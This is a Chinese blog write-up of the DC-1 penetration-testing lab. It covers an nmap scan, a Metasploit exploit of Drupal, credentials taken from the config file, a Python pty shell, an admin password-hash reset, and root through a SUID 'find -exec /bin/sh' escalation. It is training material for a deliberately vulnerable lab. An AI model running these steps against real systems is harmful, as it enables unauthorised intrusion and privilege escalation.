DC-1复现

约 1327 字大约 4 分钟

2022-06-05

DC-1复现

描述

DC-1 是一个专门建造的易受攻击的实验室，旨在获得渗透测试领域的经验。
它旨在为初学者带来挑战，但它的简单程度取决于您的技能和知识以及您的学习能力。
要成功完成这一挑战，您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验，例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。
有多种获得 root 的方法，但是，我已经包含了一些包含初学者线索的标志。
总共有五个标志，但最终目标是在 root 的主目录中找到并读取标志。您甚至不需要成为 root 即可执行此操作，但是，您将需要 root 权限。
根据您的技能水平，您可能可以跳过查找大多数这些标志并直接获取根。
初学者可能会遇到他们以前从未遇到过的挑战，但谷歌搜索应该是获取完成这一挑战所需信息的全部内容。

开始

1.利用nmap收集有用信息

确定DC-1的ip为192.168.207.136
使用命令

nmap -sT 192.168.207.136

扫描靶机开了哪些端口

发现该靶机开放了ssh服务和http服务

访问网址后看到有登录框尝试弱口令并没有成功，其中该网站的CMS是Drupal

2.使用msf查找Drupal可利用的漏洞

有7个，从上往下试，试到第二个的时候就成了

进入shell里发现了flag1.txt，提示去找配置文件

flag1：
Every goog CMS needs a config file - and so do you.

通过百度知道drupal的配置文件是在*/var/www/sites/default*下，那我们直接进到目录下 cat settings.php
在浏览配置文件得过程中发现了flag2，是关于数据库的登录信息

flag2：

/**
 *

 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
   *
    */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

3.登录MySQL和python及php脚本二点使用

用户名是：dbuser；密码是R0ck3t

直接使用MySQL命令时失效了；进到shell里使用命令也没有反应

在使用python -V的命令时，发现靶机安装了python 2.7.3版本，那么使用python一句话命令获取标准shell

python -c "import pty;pty.spawn('/bin/bash')"

1.mysql -udbuser -pR0ck3t  #连接数据库
2.show databases;       #显示数据库列表

1.use drupaldb;			#使用drupal数据库
2.show tables;			#显示库中的数据表

+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

1.select * from users;		#获取users的内容
2.name：admin |pass： $S$DbpIRKV5QXrJK4Gbhb.LDFoTjqoYNKAOB.DY3V1BL.JMbMkZANhY

经过网上搜索知道了在drupal7的安装目录中的scripts下，有一些开发者写好的PHP脚本，可以执行一些操作；

我们这次利用的脚本的名称是：password-hash.sh；

php scripts/password-hash.sh '123456'>new_paswd.txt		#把admin的密码改成123456并储存在new_passwd.txt中

那我们就可以直接拿着账号密码登录最开始访问的那个网站，在dashboard和content中都可以找到flag3

flag3：
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

flag3中有几个关键词：perms、find、-exec、shadow

4.误打误撞发现了flag4

flag4：
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?

5.提权

此时，我们想到flag3中提到的几个关键词，我们可以利用一些方法进行提权
以下命令可以查看当前系统上运行的所有SUID可执行文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

看到有find命令

利用命令提权

find root -exec '/bin/sh' \；

flag5：

Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journeyby contacting me via Twitter - @DCAU7

版权所有

版权归属：crzliang

许可证：署名 4.0 国际 (CC-BY-4.0)